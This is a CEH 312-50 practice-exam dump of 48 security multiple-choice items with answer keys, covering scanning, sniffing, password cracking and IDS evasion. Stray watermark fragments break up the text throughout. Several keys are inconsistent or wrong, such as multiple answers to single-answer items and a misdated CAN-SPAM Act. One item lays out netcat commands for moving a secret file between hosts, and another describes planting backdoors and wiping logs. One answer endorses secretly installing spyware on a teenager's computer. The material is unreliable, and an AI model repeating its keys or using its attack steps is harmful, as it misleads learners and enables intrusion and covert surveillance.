312-50 - 7 Version 3.0 PDF

ECCouncil 312-50
312-50 Ethical Hacking and Countermeasures

Practice Test
Version 3.0
ECCouncil 312-50: Practice Exam
QUESTION NO: 1
Which of the following steganography utilities exploits the nature of white space and allows the
user to conceal information in these white spaces?
A. Gif-It-Up
B. Image Hide
C. NiceText
D. Snow
Answer: D
Explanation:
The program snow is used to conceal messages in ASCII text by appending whitespace to the end
of lines. Because spaces and tabs are generally not visible in text viewers, the message is
effectively hidden from casual observers. And if the built-in encryption is used, the message
m
cannot be read even if it is detected.
.co
QUESTION NO: 2
sts
In the context of Trojans, what is the definition of a Wrapper?
A. A tool used to encapsulate packets within a new header and footer

lTe
B. An encryption tool to protect the Trojan

C. A tool used to calculate bandwidth and CPU cycles wasted by the Trojan
D. A tool used to bind the Trojan with a legitimate file
tua
Answer: D
Explanation:
Ac
These wrappers allow an attacker to take any executable back-door program and combine it with
any legitimate executable, creating a Trojan horse without writing a single line of new code.
QUESTION NO: 3
When Jason moves a file via NFS over the company's network, you want to grab a copy of it by
sniffing. Which of the following tool accomplishes this?
A. nfscopy
B. macof
C. filesnarf
D. webspy
"Pass Any Exam. Any Time." - www.actualtests.com 2

Answer: C
Explanation:
Filesnarf - sniff files from NFS traffic
OPTIONS
-i interface
Specify the interface to listen on.
-v "Versus" mode. Invert the sense of matching, to

select non-matching files.
pattern
Specify regular expression for filename matching.
expression
m
Specify a tcpdump(8) filter expression to select
traffic to sniff.
SEE ALSO
Dsniff, nfsd
.co
sts
QUESTION NO: 4
lTe
What type of port scan is shown below?
Scan directed at open port:

tua
ClientServer
192.5.2.92:4079 -----FIN/URG/PSH----->192.5.2.110:23
Ac
192.5.2.92:4079 <----NO RESPONSE------192.5.2.110:23
Scan directed at closed port:
ClientServer
192.5.2.92:4079 -----FIN/URG/PSH----->192.5.2.110:23
192.5.2.92:4079<-----RST/ACK----------192.5.2.110:23
A. Windows Scan
B. Idle Scan
C. SYN Stealth Scan
D. XMAS Scan

Answer: D
Explanation:
An Xmas port scan is variant of TCP port scan. This type of scan tries to obtain information about
the state of a target port by sending a packet which has multiple TCP flags set to 1 - "lit as an
Xmas tree". The flags set for Xmas scan are FIN, URG and PSH. The purpose is to confuse and
bypass simple firewalls. Some stateless firewalls only check against security policy those packets
which have the SYN flag set (that is, packets that initiate connection according to the standards).
Since Xmas scan packets are different, they can pass through these simple systems and reach
the target host.
QUESTION NO: 5
Derek has stumbled upon a wireless network and wants to assess its security. However, he does
m
not find enough traffic for a good capture. He intends to use AirSnort on the captured traffic to
crack the WEP key and does not know the IP address range or the AP. How can he generate
.co
traffic on the network so that he can capture enough packets to crack the WEP key?
A. Derek can use a session replay on the packets captured

sts
B. Derek can use KisMAC as it needs two USB devices to generate traffic
C. Use any ARP requests found in the capture
D. Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic
lTe
Answer: D
Explanation:
tua
By forcing the network to answer to a lot of ICMP messages you can gather enough packets to
crack the WEP key.
Ac
QUESTION NO: 6
The following is an entry captured by a network IDS. You are assigned the task of analyzing this
entry. You notice the value 0x90, which is the most common NOOP instruction for the Intel
processor. You figure that the attacker is attempting a buffer overflow attack. You also notice
"/bin/sh" in the ASCII part of the output. As an analyst what would you conclude about the attack?

m
A. The attacker is attempting a buffer overflow attack and has succeeded
B. The buffer overflow attack has been neutralized by the IDS
.co
C. The attacker is creating a directory on the compromised machine
D. The attacker is attempting an exploit that launches a command-line shell
sts
Answer: D
Explanation:
lTe
This log entry shows a hacker using a buffer overflow to fill the data buffer and trying to insert the
execution of /bin/sh into the executable code part of the thread. It is probably an existing exploit
that is used, or a directed attack with a custom built buffer overflow with the "payload" that
tua
launches the command shell.

Ac
QUESTION NO: 7
Bill has started to notice some slowness on his network when trying to update his company's
website and while trying to access the website from the Internet. Bill asks the help desk manager if
he has received any calls about slowness from the end users, but the help desk manager says
that he has not. Bill receives a number of calls from customers that cannot access the company
website and cannot purchase anything online. Bill logs on to a couple of his routers and notices
that the logs show network traffic is at an all time high. He also notices that almost all the traffic is
originating from a specific address.
Bill decides to use Geotrace to find out where the suspect IP is originates from. The Geotrace
utility runs a traceroute and finds that the IP is coming from Panama. Bill knows that none of his
customers are in Panama so he immediately thinks that his company is under a Denial of Service
attack. Now Bill needs to find out more about the originating IP address.

What Internet registry should Bill look in to find the IP address?
A. RIPE LACNIC
B. APNIC
C. ARIN
D. LACNIC
Answer: D
Explanation:
LACNIC is the Latin American and Caribbean Internet Addresses Registry that administers IP
addresses, autonomous system numbers, reverse DNS, and other network resources for that
region.
QUESTION NO: 8
m
Bob has been hired to do a web application security test. Bob notices that the site is dynamic and
.co
must make use of a back end database. Bob wants to see if SQL Injection would be possible.
What is the first character that Bob should use to attempt breaking valid SQL request?
sts
A. Semi Column
B. Single Quote
C. Exclamation Mark
lTe
D. Double Quote
Answer: B
tua
Explanation:
In SQL single quotes are used around values in queries, by entering another single quote Bob
tests if the application will submit a null value and probably returning an error.
Ac
QUESTION NO: 9
Angela is trying to access an education website that requires a username and password to login.
When Angela clicks on the link to access the login page, she gets an error message stating that
the page cannot be reached. She contacts the website's support team and they report that no one
else is having any issues with the site. After handing the issue over to her company's IT
department, it is found that the education website requires any computer accessing the site must
be able to respond to a ping from the education's server. Since Angela's computer is behind a
corporate firewall, her computer cannot ping the education website back.
What can Angela's IT department do to get access to the education website?

A. Use an Internet browser other than the one that Angela is currently using
B. Change the settings on the firewall to allow all incoming traffic on port 80
C. Change the IP on Angela's computer to an address outside the firewall
D. Change the settings on the firewall to allow all outgoing traffic on port 80
Answer: C
Explanation:
Allowing traffic to and from port 80 will not help as this will be UDP or TCP traffic and ping uses
ICMP. The browser used by the user will not make any difference. The only alternative here that
would solve the problem is to move the computer to outside the firewall.
QUESTION NO: 10
Null sessions are un-authenticated connections (not using a username or password.) to an NT or
m
2000 system. Which TCP and UDP ports must you filter to check null sessions on your network?
A. 137 and 139

.co
B. 137 and 443
C. 139 and 445
sts
D. 139 and 443
Answer: C
lTe
Explanation:
NULL sessions take advantage of "features" in the SMB (Server Message Block) protocol that
tua
exist primarily for trust relationships. You can establish a NULL session with a Windows host by
logging on with a NULL user name and password. Primarily the following ports are vulnerable if
they are accessible:
Ac
QUESTION NO: 11
An attacker runs netcat tool to transfer a secret file between two hosts.
Machine A: netcat -l -p 1234 < secretfile

achine B: netcat 192.168.3.4 > 1234
He is worried about information being sniffed on the network. How would the attacker use netcat to
encrypt the information before transmitting onto the wire?
A. Use cryptcat instead of netcat

B. Machine A: netcat -l -p -s password 1234 < testfile
Machine B: netcat <machine A IP> 1234
C. Machine A: netcat -l -e magickey -p 1234 < testfile
Machine B: netcat <machine A IP> 1234
D. Machine A: netcat -l -p 1234 < testfile -pw password
Machine B: netcat <machine A IP> 1234 -pw password
Answer: A
Explanation:
Netcat cannot encrypt the file transfer itself but would need to use a third party application to
encrypt/decrypt like openssl. Cryptcat is the standard netcat enhanced with twofish encryption.
QUESTION NO: 12
LAN Manager passwords are concatenated to 14 bytes, and split in half. The two halves are
hashed individually. If the password is 7 characters or less, than the second half of the hash is
m
always:
A. 0xAAD3B435B51404AA
.co
B. 0xAAD3B435B51404CC
C. 0xAAD3B435B51404BB
sts
D. 0xAAD3B435B51404EE
Answer: D
lTe
Explanation:
A problem with LM stems from the total lack of salting or cipher block chaining in the hashing
tua
process. To hash a password the first 7 bytes of it are transformed into an 8 byte odd parity DES
key. This key is used to encrypt the 8 byte string "KGS!@". Same thing happens with the second
part of the password. This lack of salting creates two interesting consequences. Obviously this
Ac
means the password is always stored in the same way, and just begs for a typical lookup table
attack. The other consequence is that it is easy to tell if a password is bigger than 7 bytes in size.
If not, the last 7 bytes will all be null and will result in a constant DES hash of
0xAAD3B435B51404EE.
QUESTION NO: 13
Lori has just been tasked by her supervisor toonduct vulnerability scan on the corporate
network.She has been instructed to perform a very thorough test of the network to ensure that
there are no security holes on any of the machines.Lori's company does not own any commercial
scanning products, so she decides to download a free one off the Internet.Lori has never done a
vulnerability scan before, so she is unsure of some of the settings available in the software she
downloaded.One of the options is to choose which ports that can be scanned.Lori wants to do

exactly what her boss has told her, but she does not know what ports should be scanned.
If Lori is supposed to scan all known TCP ports, how many ports should she select in the
software?
A. 1025
B. 1024
C. 65536
D. Lori should not scan TCP ports, only UDP ports
Answer: C
Explanation:
In both TCP and UDP, each packet header will specify a source port and a destination port, each
of which is a 16-bit unsigned integer (i.e. ranging from 0 to 65535).
m
QUESTION NO: 14 .co
Hackers usually control Bots through:
sts
A. MSN Messenger
B. Trojan client software
C. GoogleTalk
lTe
D. Yahoo Chat
E. IRC Channel
tua
Answer: E
Explanation:
Most of the bots out today has a function to connect to a predetermined IRC channel in order to
Ac
get orders.
QUESTION NO: 15
NetBIOS over TCP/IP allows files and/or printers to be shared over the network. You are trying to
intercept the traffic from a victim machine to a corporate network printer. You are attempting to
hijack the printer network connection from your laptop by sniffing the wire.
Which port does SMB over TCP/IP use?
A. 445
B. 139

C. 179
D. 443
Answer: A
QUESTION NO: 16
You ping a target IP to check if the host is up. You do not get a response. You suspect ICMP is
blocked at the firewall. Next you use hping2 tool to ping the target host and you get a response.
Why does the host respond to hping2 and not ping packet?
[ceh]# ping 10.2.3.4

PING 10.2.3.4 (10.2.3.4) from 10.2.3.80 : 56(84) bytes of data.
m
--- 10.2.3.4 ping statistics ---
3 packets transmitted, 0 packets received, 100% packet loss
[ceh]# ./hping2 -c 4 -n -i 2 10.2.3.4

.co
HPING 10.2.3.4 (eth0 10.2.3.4): NO FLAGS are set, 40 headers +
sts
0 data bytes
len=46 ip=10.2.3.4 flags=RA seq=0 ttl=128 id=54167 win=0 rtt=0.8 ms
lTe

tua
--- 10.2.3.4 hping statistic ---

4 packets tramitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.7/0.8/0.8 ms
Ac
A. hping2 uses TCP instead of ICMP by default

B. you must use ping 10.2.3.4 switch
C. ping packets cannot bypass firewalls
D. hping2 uses stealth TCP packets to connect
Answer: A
Explanation:
Default protocol is TCP, by default hping2 will send tcp headers to target host's port 0 with a
winsize of 64 without any tcp flag on. Often this is the best way to do an 'hide ping', useful when
target is behind a firewall that drop ICMP. Moreover a tcp null-flag to port 0 has a good probability
of not being logged.

QUESTION NO: 17
In the context of Windows Security, what is a 'null' user?
A. An account that has been suspended by the admin

B. A pseudo account that was created for security administration purpose
C. A pseudo account that has no username and password
D. A user that has no skills
Answer: C
Explanation:
NULL sessions take advantage of "features" in the SMB (Server Message Block) protocol that
exist primarily for trust relationships. You can establish a NULL session with a Windows host by
logging on with a NULL user name and password. Using these NULL connections allows you to
gather the following information from the host: * List of users and groups * List of machines * List
m
of shares * Users and host SID' (Security Identifiers)
NULL sessions exist in windows networking to allow: * Trusted domains to enumerate resources *
.co
Computers outside the domain to authenticate and enumerate users * The SYSTEM account to
authenticate and enumerate resources
NetBIOS NULL sessions are enabled by default in Windows NT and 2000. Windows XP and 2003
sts
will allow anonymous enumeration of shares, but not SAM accounts.
lTe
QUESTION NO: 18
Which definition below best describes a covert channel?

tua
A. A server program using a port that is not well known

B. It is one of the weak channels used by WEP that makes it insecure
Ac
C. Making use of a protocol in a way it was not intended to be used

D. It is the multiplexing taking place on a communication link
Answer: C
Explanation:
A covert channel is a hidden communication channel not intended for information transfer at all.
Redundancy can often be used to communicate in a covert way. There are several ways that
hidden communication can be set up.
QUESTION NO: 19
You have installed antivirus software and you want to be sure that your AV signatures are working
correctly. You don't want to risk the deliberate introduction of a live virus to test the AV software.

You would like to write a harmless test virus, which is based on the European Institute for
Computer Antivirus Research format that can be detected by the AV software.
How should you proceed?
A. Type the following code in notepad and save the file as SAMPLEVIRUS.COM. Your antivirus
program springs into action whenever you attempt to open, run or copy it.
X5O!P%@AP[4\PZX54(P^)7CC)7}$SAMPLEVIRUS-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
B. Type the following code in notepad and save the file as EICAR.COM. Your antivirus program
springs into action whenever you attempt to open, run or copy it.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
C. Type the following code in notepad and save the file as AVFILE.COM. Your antivirus program
m
X5O!P%@AP[4\PZX54(P^)7CC)7}$AVFILE-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
.co
D. Type the following code in notepad and save the file as TESTAV.COM. Your antivirus program
sts
X5O!P%@AP[4\PZX54(P^)7CC)7}$TESTAV-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Answer: B
lTe
QUESTION NO: 20
tua
Paula works as the primary help desk contact for her company.Paula has just received a call from
a user reporting that his computer just displayed a Blue Screen of Death screen and he can no
Ac
longer work.Paula walks over to the user's computer and sees the Blue Screen of Death
screen.The user's computer is running Windows XP, but the Blue Screen looks like a familiar one
that Paula had seen on Windows 2000 computers periodically.
The user said he stepped away from his computer for only 15 minutes and when he got back, the
Blue Screen was there.Paula also noticed that the hard drive activity light was flashing, meaning
that the computer was processing something.Paula knew this should not be the case since the
computer should be completely frozen during a Blue Screen. She checks the network IDS live log
entries and notices numerous nmap scan alerts.
What is Paula seeing happen on this computer?
A. Paula's network was scanned using Floppyscan

B. There was IRQ conflict in Paula's PC
C. Paula's network was scanned using Dumpsec
D. Tools like Nessus will cause BSOD
Answer: A
Explanation:
Floppyscan is a dangerous hacking tool which can be used to portscan a system using a floppy
disk Bootsup mini Linux Displays Blue screen of death screen Port scans the network using NMAP
Send the results by e-mail to a remote server.
QUESTION NO: 21
How would you describe an attack where an attacker attempts to deliver the payload over multiple
packets over long periods of time with the purpose of defeating simple pattern matching in IDS
m
systems without session reconstruction? A characteristic of this attack would be a continuous
stream of small packets. .co
A. Session Splicing
B. Session Stealing
sts
C. Session Fragmentation
D. Session Hijacking
lTe
Answer: A
tua
QUESTION NO: 22
In an attempt to secure his wireless network, Bob turns off broadcasting of the SSID. He
Ac
concludes that since his access points require the client computer to have the proper SSID, it
would prevent others from connecting to the wireless network. Unfortunately unauthorized users
are still able to connect to the wireless network. Why do you think this is possible?
A. The SSID is still sent inside both client and AP packets

B. Bob forgot to turn off DHCP
C. Bob's solution only works in ad-hoc mode
D. All access points are shipped with a default SSID
Answer: A,B
Explanation:
All access points are shipped with a default SSID unique to that manufacturer, for example 3com
uses the default ssid comcomcom.

QUESTION NO: 23
What is the advantage in encrypting the communication between the agent and the monitor in an
Intrusion Detection System?
A. Encryption of agent communications will conceal the presence of the agents

B. Alerts are sent to the monitor when a potential intrusion is detected
C. An intruder could intercept and delete data or alerts and the intrusion can go undetected
D. The monitor will know if counterfeit messages are being generated because they will not be
encrypted
Answer: D
m
QUESTION NO: 24
.co
Ron has configured his network to provide strong perimeter security. As part of his network
architecture, he has included a host that is fully exposed to attack. The system is on the public
side of the demilitarized zone, unprotected by a firewall or filtering router. What would you call
sts
such a host?
A. DMZ host
lTe
B. Honeypot
C. DWZ host
D. Bastion Host
tua
Answer: A,B,D
Ac
Explanation:
A bastion host is a gateway between an inside network and an outside network. Used as a
security measure, the bastion host is designed to defend against attacks aimed at the inside
network. Depending on a network's complexity and configuration, a single bastion host may stand
guard by itself, or be part of a larger security system with different layers of protection.
QUESTION NO: 25
Bob is going to perform an active session hijack against Brownies Inc. He has found a target that
allows session oriented connections (Telnet) and performs the sequence prediction on the target
operating system. He manages to find an active session due to the high level of traffic on the
network. What is Bob supposed to do next?

A. Reverse sequence prediction
B. Take one of the parties offline
C. Guess the sequence numbers
D. Take over the session
Answer: C
QUESTION NO: 26
Which of the following snort rules look for FTP root login attempts?
A. alert ftp -> ftp (content:"user password root";)

B. alert tcp any any -> any any 21 (content:"user root";)
C. alert tcp -> any port 21 (message:"user root";)
D. alert tcp -> any port 21 (msg:"user root";)
m
Answer: B
Explanation:
.co
The snort rule header is built by defining action (alert), protocol (tcp), from IP subnet port (any
sts
any), to IP subnet port (any any 21), Payload Detection Rule Options (content:"user root";)
lTe
QUESTION NO: 27
An attacker has been successfully modifying the purchase price of items purchased at a web site.
tua
The security administrators verify the web server and Oracle database have not been
compromised directly. They have also verified the IDS logs and found no attacks that could have
caused this. What is the mostly likely way the attacker has been able to modify the price?
Ac
A. By using SQL injection

B. By changing hidden form values in a local copy of the web page
C. By using cross site scripting
D. There is no way the attacker could do this without directly compromising either the web server
or the database
Answer: B
Explanation:
Changing hidden form values is possible when a web site is poorly built and is trusting the visitors
computer to submit vital data, like the price of a product, to the database.

QUESTION NO: 28
Why is Social Engineering considered attractive by hackers and commonly done by experts in the
field?
A. It is easy and extremely effective to gain information

B. It is done by well-known hackers
C. It does not require a computer in order to commit a crime
D. It is not considered illegal
Answer: A
Explanation:
Social engineering is a collection of techniques used to manipulate people into performing actions
or divulging confidential information. While similar to a confidence trick or simple fraud, the term
typically applies to trickery for information gathering or computer system access and in most (but
m
not all) cases the attacker never comes face-to-face with the victim. The term has been
popularized in recent years by well known (reformed) computer criminal and security consultant
.co
Kevin Mitnick who points out that it's much easier to trick someone into giving you his or her
password for a system than to spend the effort to hack in. He claims it to be the single most
effective method in his arsenal.
sts
lTe
QUESTION NO: 29
Harold just got home from working at Henderson LLC where he works as an IT technician. He was
able to get off early because they were not too busy. When he walks into his home office, he
tua
notices his teenage daughter on the computer, apparently chatting with someone online. As soon
as she hears Harold enter the room, she closes all her windows and tries to act like she was
playing a game.?When Harold asks her what she was doing, she acts very nervous and does not
Ac
give him a straight answer. Harold is very concerned because he does not want his daughter to
fall victim to online predators and the sort. Harold doesn't necessarily want to install any programs
that will restrict the sites his daughter goes to, because he doesn't want to alert her o his trying to
figure out what she is doing.
Harold wants to use some kind of program that will track her activities online, and send Harold an
email of her activity once a day so he can see what she has been up to. What kind of software
could Harold use to accomplish this?
A. Install VNC on her computer

B. Install hardware Keylogger on her computer
C. Enable Remote Desktop on her computer
D. Install screen capturing Spyware on her computer

Answer: D
QUESTION NO: 30
How do you defend against ARP Spoofing?
A. Use ARPWALL system and block ARP spoofing attacks

B. Use private VLANS
C. Tune IDS Sensors to look for large amount of ARP traffic on local subnets
D. Place static ARP entries on servers, workstation and routers
Answer: B,C,D
Explanation:
ARPWALL is a opensource tools will give early warning when arp attack occurs. This tool is still
m
under construction.
.co
QUESTION NO: 31
sts
Jim's organization just completed a major Linux roll out and now all of the organization's systems
are running the Linux 2.5 kernel. The roll out expenses has posed constraints on purchasing other
essential security equipment and software. The organization requires an option to control network
lTe
traffic and also perform stateful inspection of traffic going into and out of the DMZ. Which built-in
functionality of Linux can achieve this?
tua
A. IP Chains
B. IP ICMP
C. IP Sniffer
Ac
D. IP Tables
Answer: D
Explanation:
iptables is a user space application program that allows a system administrator to configure the
netfilter tables, chains, and rules (described above). Because iptables requires elevated privileges
to operate, it must be executed by user root, otherwise it fails to function. On most Linux systems,
iptables is installed as /sbin/iptables . IP Tables performs stateful inspection while the older IP
Chains only performs stateless inspection.
QUESTION NO: 32

Richard is a network administrator working at a student loan company in Iowa. This company
processes over 20,000 student loans a year from colleges all over the state. Most communication
between the company, schools, and lenders is carried out through email. Because of privacy laws
that are in the process of being implemented, Richard wants to get ahead of the game and
become compliant before any sort of auditing occurs. Much of the email communication used at
his company contains sensitive information such as social security numbers. For this reason,
Richard wants to utilize email encryption agency-wide. The only problem for Richard is that his
department only has a couple of servers, and they are utilized to their full capacity. Since a server-
based PKI is not an option for him, he is looking for a low/no cost solution to encrypt email.
What should Richard use?
A. 3DES
B. RSA
C. PGP
m
D. OTP
Answer: C .co
Explanation:
sts
PGP (Pretty Good Privacy) is an encryption program being used for secure transmission of files
and e-mails. This adapts public-key encryption technology in which pairs of keys are used to
maintain secure communication. For PGP-based communication both the sender and receiver
lTe
should have public and private key pairs. The sender's public key should be distributed to the
receiver. Similarly, the receiver's public key should be distributed to the sender. When sending a
message or a file, the sender can sign using his private key. Also, the sender's private key is
tua
never distributed. All encryption is made on the workstation sending the e-mail.
Ac
QUESTION NO: 33
Samantha has been actively scanning the client network for which she is doing a vulnerability
assessment test. While doing a port scan she notices ports open in the 135 to 139 range. What
protocol is most likely to be listening on those ports?
A. SMB
B. Finger
C. FTP
D. Samba
Answer: A
Explanation:

Port 135 is for RPC and 136-139 is for NetBIOS traffic. SMB is an upper layer service that runs on
top of the Session Service and the Datagram service of NetBIOS.
QUESTION NO: 34
What does ICMP (type 11, code 0) denote?
A. Destination Unreachable
B. Unknown Type
C. Source Quench
D. Time Exceeded
Answer: D
Explanation:
m
An ICMP Type 11, Code 0 means Time Exceeded [RFC792], Code 0 = Time to Live exceeded in
Transit and Code 1 = Fragment Reassembly Time Exceeded.
.co
QUESTION NO: 35
sts
LM authentication is not as strong as Windows NT authentication so you may want to disable its
use, because an attacker eavesdropping on network traffic will attack the weaker protocol. A
lTe
successful attack can compromise the user's password. How do you disable LM authentication in
Windows XP?
tua
A. Disable LM authentication in the registry

B. Disable LSASS service in Windows XP
C. Stop the LM service in Windows XP
Ac
D. Download and install LMSHUT.EXE tool from Microsoft's website
Answer: A
Explanation:
http://support.microsoft.com/kb/299656
QUESTION NO: 36
Johnny is a member of the hacking group Orpheus1. He is currently working on breaking into the
Department of Defense's front end Exchange Server. He was able to get into the server, located in
a DMZ, by using an unused service account that had a very weak password that he was able to
guess. Johnny wants to crack the administrator password, but does not have a lot of time to crack
it. He wants to use a tool that already has the LM hashes computed for all possible permutations
of the administrator password.?
What tool would be best used to accomplish this?
A. SMBCrack
B. RainbowCrack
C. SmurfCrack
D. PSCrack
Answer: B
Explanation:
RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory
trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force
cracker try all possible plaintexts one by one in cracking time. It is time consuming to break
complex password in this way. The idea of time-memory trade-off is to do all cracking time
m
computation in advance and store the result in files so called "rainbow table". It does take a long
time to precompute the tables. But once the one time precomputation is finished, a time-memory
.co
trade-off cracker can be hundreds of times faster than a brute force cracker, with the help of
precomputed tables.
sts
QUESTION NO: 37
lTe
Basically, there are two approaches to network intrusion detection: signature detection, and
anomaly detection. The signature detection approach utilizes well-known signatures for network
tua
traffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previous
history of network traffic to search for patterns that are abnormal, which would indicate an
intrusion. How can an attacker disguise his buffer overflow attack signature such that there is a
greater probability of his attack going undetected by the IDS?
Ac
A. He can chain NOOP instructions into a NOOP "sled" that advances the processor's instruction
pointer to a random place of choice
B. He can use polymorphic shell code ?with a tool such as ADMmutate - to change the signature
of his exploit as seen by a network IDS
C. He can use a dynamic return address to overwrite the correct value in the target machine's
computer memory
D. He can use a shellcode that will perform a reverse telnet back to his machine
Answer: B
Explanation:
ADMmutate is using a polymorphic technique designed to circumvent certain forms of signature
based intrusion detection. All network based remote buffer overflow exploits have similarities in

how they function. ADMmutate has the ability to emulate the protocol of the service the attacker is
attempting to exploit. The data payload (sometimes referred to as an egg) contains the instructions
the attacker wants to execute on the target machine. These eggs are generally interchangeable
and can be utilized in many different buffer overflow exploits. ADMmutate uses several techniques
to randomize the contents of the egg in any given buffer overflow exploit. This randomization
effectively changes the content or 'signature' of the exploit without changing the functionality of the
exploit.
QUESTION NO: 38
Which of the following encryption is not based on block cipher?
A. DES
B. Blowfish
m
C. RC4
D. AES (Rijndael)
Answer: C
.co
Explanation:
sts
RC4 (also known as ARC4 or ARCFOUR ) is the most widely-used software stream cipher and is
used in popular protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and
lTe
WEP (to secure wireless networks).

tua
QUESTION NO: 39
SYN Flood is a DOS attack in which an attacker deliberately violates the three-way handshake
and opens a large number of half-open TCP connections. The signature of attack for SYN Flood
Ac
contains:
A. The source and destination port numbers having the same value
B. A large number of SYN packets appearing on a network with the corresponding reply packets
C. A large number of SYN packets appearing on a network without the corresponding reply
packets
D. The source and destination address having the same value
Answer: C
Explanation:
A SYN attack occurs when an attacker exploits the use of the buffer space during a Transmission
Control Protocol (TCP) session initialization handshake. The attacker floods the target system's
small "in-process" queue with connection requests, but it does not respond when a target system
replies to those requests. This causes the target system to time out while waiting for the proper
response, which makes the system crash or become unusable.
QUESTION NO: 40
Nathalie would like to perform a reliable scan against a remote target. She is not concerned about
being stealth at this point. Which of the following type of scans would be the most accurate and
reliable?
A. A UDP scan
B. A FIN scan
C. A TCP Connect scan
D. A half-scan
Answer: C
m
Explanation:
The connect() system call provided by your operating system is used to open a connection to
.co
every interesting port on the machine. If the port is listening, connect() will succeed, otherwise the
port isn't reachable. One strong advantage to this technique is that you don't need any special
privileges. This is the fastest scanning method supported by nmap, and is available with the -t
sts
(TCP) option. The big downside is that this sort of scan is easily detectable and filterable.
lTe
QUESTION NO: 41
Virus Scrubbers and other malware detection program can only detect items they know about.
tua
Which of the following tool would allow you to detect unauthorized changes or modification of
binary files on your system by unknown malware?
Ac
A. Anti-Virus Software
B. A properly configured gateway
C. File integrity verification tools
D. There is no way of finding out until a new updated signature file is released
Answer: C
Explanation:
Programs like Tripwire aids system administrators and users in monitoring a designated set of
files for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify
system administrators of corrupted or tampered files, so damage control measures can be taken in
a timely manner.

QUESTION NO: 42
You have successfully brute forced basic authentication configured on a Web server using Brutus
hacking tool. The username / password is "Admin" and "Bettlemani@". You logon to the system
using the brute forced password and plant backdoors and rootkits.
After downloading various sensitive documents from the compromised machine, you proceed to
clear the log files to hide your trace.
Which event log located at c:\windows\system32\config contains the trace of your brute force
attempts?
A. SecEvent.Evt
B. SysEvent.Evt
C. WinEvent.Evt
m
D. AppEvent.Evt
Answer: A
Explanation:
.co
The Security Event log (SecEvent.Evt) will contain all the failed logins against the system.
sts
lTe
QUESTION NO: 43
In Buffer Overflow exploit, which of the following registers gets overwritten with return address of
the exploit code?
tua
A. EAP
B. EEP
Ac
C. ESP
D. EIP
Answer: D
Explanation:
EIP is the instruction pointer which is a register, it points to your next command.
QUESTION NO: 44
Samuel is a high school teenager who lives in Modesto California. Samuel is a straight 'A' student
who really likes tinkering around with computers and other types of electronic devices. Samuel just
received a new laptop for his birthday and has been configuring it ever since. While tweaking the
registry, Samuel notices a pop up at the bottom of his screen stating that his computer was now

connected to a wireless network. All of a sudden, he was able to get online and surf the Internet.
Samuel did some quick research and was able to gain access to the wireless router he was
connecting to and see all of its settings. Being able to hop onto someone else's wireless network
so easily fascinated Samuel, so he began doing more and more research on wireless technologies
and how to exploit them. The next day, Samuel's friend said that he could drive around all over
town and pick up hundreds upon hundreds of wireless networks. This really excited Samuel so
they got into his friend's car and drove around the city seeing which networks they could connect
to and which ones they could not.
What has Samuel and his friend just performed?
A. Wardriving
B. Warwalking
C. Warchalking
m
D. Webdriving
Answer: A .co
Explanation:
sts
Wardriving is the act of searching for Wi-Fi wireless networks by a person in a moving vehicle
using a Wi-Fi-equipped computer, such as a laptop or a PDA, to detect the networks. It was also
known (as of 2002) as "WiLDing" (Wireless Lan Driving, although this term never gained any
lTe
popularity and is no longer used), originating in the San Francisco Bay Area with the Bay Area
Wireless Users Group (BAWUG). It is similar to using a scanner for radio.
tua
QUESTION NO: 45
Neil notices that a single address is generating traffic from its port 500 to port 500 of several other
Ac
machines on the network. This scan is eating up most of the network bandwidth and Neil is
concerned. As a security professional, what would you infer from this scan?
A. It is a network fault and the originating machine is in a network loop

B. It is a worm that is malfunctioning or hardcoded to scan on port 500
C. The attacker is trying to detect machines on the network which have SSL enabled
D. The attacker is trying to determine the type of VPN implementation and checking for IPSec
Answer: D
Explanation:
Port 500 is used by IKE (Internet Key Exchange). This is typically used for IPSEC-based VPN
software, such as Freeswan, PGPnet, and various vendors of in-a-box VPN solutions such as
Cisco. IKE is used to set up the session keys. The actual session is usually sent with ESP

(Encapsulated Security Payload) packets, IP protocol 50 (but some in-a-box VPN's such as Cisco
are capable of negotiating to send the encrypted tunnel over a UDP channel, which is useful for
use across firewalls that block IP protocols other than TCP or UDP).
QUESTION NO: 46
Rebecca is a security analyst and knows of a local root exploit that has the ability to enable local
users to use available exploits to gain root privileges. This vulnerability exploits a condition in the
Linux kernel within the execve() system call. There is no known workaround that exists for this
vulnerability. What is the correct action to be taken by Rebecca in this situation as a
recommendation to management?
A. Rebecca should make a recommendation to upgrade the Linux kernel promptly

B. Rebecca should make a recommendation to set all child-process to sleep within the execve()
m
C. Rebecca should make a recommendation to disable the execve() system call
D. Rebecca should make a recommendation to hire more system administrators to monitor all
.co
child processes to ensure that each child process can't elevate privilege
Answer: A
sts
QUESTION NO: 47
lTe
WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by
recursively retrieving linked pages. Search engines like Google, frequently spider web pages for
tua
indexing.
How will you stop web spiders from crawling certain directories on your website?
Ac
A. Place "HTTP:NO CRAWL" on the html pages that you don't want the crawlers to index
B. Place robots.txt file in the root of your website with listing of directories that you don't want to be
crawled
C. Enable SSL on the restricted directories which will block these spiders from crawling
D. Place authentication on root directories that will prevent crawling from these spiders
Answer: B
QUESTION NO: 48
Which of the following act in the United States specifically criminalizes the transmission of
unsolicited commercial e-mail (SPAM) without an existing business relationship.

A. 2004 CANSPAM Act
B. 1990 Computer Misuse Act
C. 2005 US-SPAM 1030 Act
D. 2003 SPAM Prevention Act
Answer: A
Explanation:
The CAN-SPAM Act of 2003 (Controlling the Assault of Non-Solicited Pornography and Marketing
Act) establishes requirements for those who send commercial email, spells out penalties for
spammers and companies whose products are advertised in spam if they violate the law, and
gives consumers the right to ask emailers to stop spamming them. The law, which became
effective January 1, 2004, covers email whose primary purpose is advertising or promoting a
commercial product or service, including content on a Web site. A "transactional or relationship
message" - email that facilitates an agreed-upon transaction or updates a customer in an existing
m
business relationship - may not contain false or misleading routing information, but otherwise is
exempt from most provisions of the CAN-SPAM Act.
.co
QUESTION NO: 49
sts
You are gathering competitive intelligence on an organization. You notice that they have jobs
